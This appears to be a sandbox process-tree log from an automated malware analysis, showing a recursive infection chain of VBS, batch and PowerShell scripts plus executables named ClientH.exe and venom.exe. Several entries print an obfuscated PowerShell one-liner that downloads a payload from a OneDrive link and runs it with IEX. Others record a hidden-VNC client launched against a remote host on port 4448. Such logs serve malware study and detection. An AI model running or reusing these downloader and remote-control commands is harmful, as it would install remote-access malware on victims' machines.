        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        31⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7852
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        27⤵
        
        PID:8012
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        28⤵
        
        PID:7700
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        28⤵
        
        PID:6324
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        27⤵
        
        PID:7520
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        27⤵
        
        PID:7764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1864
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        29⤵
        
        PID:4148
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        30⤵
        
        PID:10800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8032
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        26⤵
        
        PID:7668
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        27⤵
        
        PID:1084
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        27⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        26⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        26⤵
        
        PID:7852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7112
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        28⤵
        
        PID:10364
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        29⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9432
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        25⤵
        
        PID:7304
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        26⤵
        
        PID:7184
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        26⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        25⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        25⤵
        
        PID:7488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6528
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        27⤵
        
        PID:10508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        28⤵
        
        PID:8468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11088
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        24⤵
        
        PID:7516
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        25⤵
        
        PID:7704
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        25⤵
        
        PID:7712
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        24⤵
        
        PID:7524
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        24⤵
        
        PID:7768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6396
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        26⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        27⤵
        
        PID:9048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9304
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        23⤵
        
        PID:6584
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        24⤵
        
        PID:7392
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        24⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        23⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        23⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8140
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        25⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        26⤵
        
        PID:9804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        27⤵
        
        PID:11096
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        22⤵
        
        PID:6236
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        23⤵
        
        PID:6812
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        23⤵
        
        PID:7016
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        23⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        22⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        22⤵
        
        PID:7104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3812
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        24⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        25⤵
        
        PID:10028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        21⤵
        
        PID:344
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        22⤵
        
        PID:6464
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        22⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        21⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        21⤵
        
        PID:5872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6540
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        23⤵
        
        PID:7688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        24⤵
        
        PID:9132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        25⤵
        
        PID:8040
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        20⤵
        
        PID:7076
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        21⤵
        
        PID:5808
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        21⤵
        
        PID:6468
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        21⤵
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        20⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        20⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3336
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        22⤵
        
        PID:7380
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        23⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        24⤵
        
        PID:7052
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        19⤵
        
        PID:6524
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        20⤵
        
        PID:6284
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        20⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        19⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        19⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6872
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        21⤵
        
        PID:8360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        22⤵
        
        PID:8472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        23⤵
        
        PID:8912
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        18⤵
        
        PID:6980
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        19⤵
        
        PID:7028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        19⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        18⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        18⤵
        
        PID:6412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6952
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        20⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        21⤵
        
        PID:9044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        17⤵
        
        PID:6468
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        18⤵
        
        PID:6584
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        18⤵
        
        PID:6648
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        17⤵
        
        PID:6592
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        17⤵
        
        PID:6692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4828
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        19⤵
        
        PID:8464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        20⤵
        
        PID:8448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9912
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        16⤵
        
        PID:5668
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        17⤵
        
        PID:6096
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        17⤵
        
        PID:5860
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        17⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        16⤵
        
        PID:344
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        16⤵
        
        PID:6324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7000
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        18⤵
        
        PID:8396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        19⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        20⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        15⤵
        
        PID:3368
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        16⤵
        
        PID:1192
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        16⤵
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        15⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        15⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
